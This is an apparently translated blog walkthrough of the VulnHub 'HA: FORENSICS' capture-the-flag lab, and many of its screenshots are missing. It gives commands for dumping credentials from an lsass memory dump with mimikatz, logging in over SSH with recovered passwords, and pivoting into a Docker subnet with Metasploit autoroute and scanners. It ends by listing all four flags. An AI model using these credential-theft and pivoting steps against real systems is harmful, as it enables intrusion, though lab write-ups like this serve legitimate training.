HA: FORENSICS in VulnHub Shooting Range

HA: FORENSICS in VulnHub Shooting Range

Check ip:
Insert picture description here
scan port, find open port 80 and 22, access port 80,
scan the directory, find tips.txt:
Insert picture description here
download the zip, find the password is needed, visit the igolder directory, find the pgp key information, go to online decryption:
Insert picture description here
Crack the password:
Insert picture description here
get flag2:
Insert picture description here
there is still a lsass.DMP file in the compressed package,
put it in minikatz to solve it:

mimikatz # sekurlsa::minidump lsass.dmp
mimikatz # sekurlsa::logonPasswords full

Get:
Insert picture description here
Take it to decrypt it:
Insert picture description here
ssh connection: It is
Insert picture description here
found that sodu is not working later, ifconfig finds a docker:
Insert picture description here
switch to use msf for ssh login, and use its automatic routing module:

use auxiliary/scanner/ssh/ssh_login
set rhosts 192.168.198.154
set username jasoos
set password Password@1
exploit
session -u 1
use post/multi/manage/autoroute
set session 2
exploit

Insert picture description here
Insert picture description here
Use ping to scan for live hosts

use post/multi/gather/ping_sweep
set session 2
set rhosts 172.17.0.0/24
exploit

Insert picture description here
Scan port

use auxiliary/scanner/portscan/tcp
set rhosts 172.17.0.2
set port 1-100
exploit
use auxiliary/scanner/ftp/anonymous
set rhosts 172.17.0.2
exploit

Insert picture description here
Enter ftp to view files:

shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
ftp 172.17.0.2
anonymous
ls
cd pub
ls
get saboot.001

Insert picture description here
Download to the target machine:
Insert picture description here
open python -m SimpleHTTPServer, download the file:
Insert picture description here
use autopsy:
Insert picture description here
create a case first:
Insert picture description here
Insert picture description here
after creating a case, a specific host is required, and the host name is required. After filling in the name, click "Add Host" to continue
Insert picture description here
creating the host and ask us to add An image file:
Insert picture description here
Insert picture description here
Insert picture description here
Next, set as the default value, and then click "Add":
Insert picture description here
Analysis:
Insert picture description here
View file:
Insert picture description here
Open flag:
Insert picture description here
Open creds:
Insert picture description here
Base64 decryption:
Insert picture description here
Switch another user: There are
Insert picture description here
four flags in total, one is missing, and the picture is steganographic :
Insert picture description here

Insert picture description here
全部:
flag1:Flag:1 {bc02d4ffbeeab9f57c5e03de1098ff31}
flag2:Flag:2 {4a3232c59ecda21ac71bebe3b329bf36}
flag3:Flag:3 {8442460f48338fe60a9497b8e0e9022f}
flag4:Flag: {9440aee508b6215995219c58c8ba4b45}

Guess you like

Origin blog.csdn.net/qq_42967398/article/details/109451501